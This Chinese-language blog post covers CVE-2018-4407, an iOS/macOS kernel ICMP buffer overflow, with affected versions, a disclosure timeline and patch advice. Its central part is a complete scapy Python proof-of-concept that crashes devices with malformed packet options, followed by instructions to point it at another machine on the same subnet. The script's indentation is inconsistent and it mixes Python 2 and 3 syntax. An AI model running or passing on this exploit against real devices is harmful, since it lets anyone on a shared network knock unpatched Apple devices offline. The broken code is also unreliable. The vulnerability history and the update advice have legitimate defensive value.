最新IOS缓冲区溢出漏洞

视频观看：

影响版本

Apple iOS 11及更早版本：所有设备（升级到iOS 12的部分设备）

Apple macOS High Sierra（受影响的最高版本为10.13.6）：所有设备（通过安全更新2018-001修复）

Apple macOS Sierra（受影响的最高版本为10.12.6）：所有设备（通过安全更新2018-005中修复）

Apple OS X El Capitan及更早版本：所有设备

时间线

2018-08-09：私下向product-security@apple.com披露。包括概念验证漏洞利用。

2018-08-09：报告由product-security@apple.com承认。

2018-08-20：product-security@apple.com让我向他们发送确切的macOS版本号和恐慌日志。

2018-08-20：将所需信息返回至product-security@apple.com。还向他们发送了一个略微改进的漏洞PoC版本。

2018-08-22：product-security@apple.com确认该问题已在macOS Mojave和iOS 12的测试版中得到修复。但是，他们还表示他们“正在调查在其他平台上解决此问题”并且他们将直到2018年11月才公布此问题。

2018-09-17：Apple发布iOS 12。该漏洞已得到修复。

2018-09-24：macOS Mojave由Apple发布。该漏洞已得到修复。

2018-10-30：泄漏漏洞。

poc代码：

# CVE-2018-4407 ICMP DOS
# https://lgtm.com/blog/apple_xnu_icmp_error_CVE-2018-4407
# from https://twitter.com/ihackbanme
 import sys
try:
  from scapy.all import *
except Exception as e:
  print ("[*] You need install scapy first:\n[*] sudo pip install scapy ")
 if __name__ == '__main__':
  try:
    check_ip = sys.argv[1]
        print ("[*] !!!!!!Dangerous operation!!!!!!")
    print ("[*] Trying CVE-2018-4407 ICMP DOS " + check_ip)
    for i in range(8,20):
        send(IP(dst=check_ip,options=[IPOption("A"*i)])/TCP(dport=2323,options=[(19, "1"*18),(19, "2"*18)]))
    print ("[*] Check Over!! ")
  except Exception as e:
    print "[*] usage: sudo python check_icmp_dos.py 127.0.0.1"

该poc脚本需要安装scapy模块以及python的运行环境

复现时把127.0.0.1改成同网段内目标机器的ip地址即可

Windows下运行该POC需要安装winpcap哦

下载地址：https://www.winpcap.org/

建议：

将自己的苹果设备更新至IOS12最新版本。版本低的小伙伴暂时别使用公共wifi和免费wifi，从而避免自己受到此类攻击.

原文地址

https://lgtm.com/blog/apple_xnu_icmp_error_CVE-2018-4407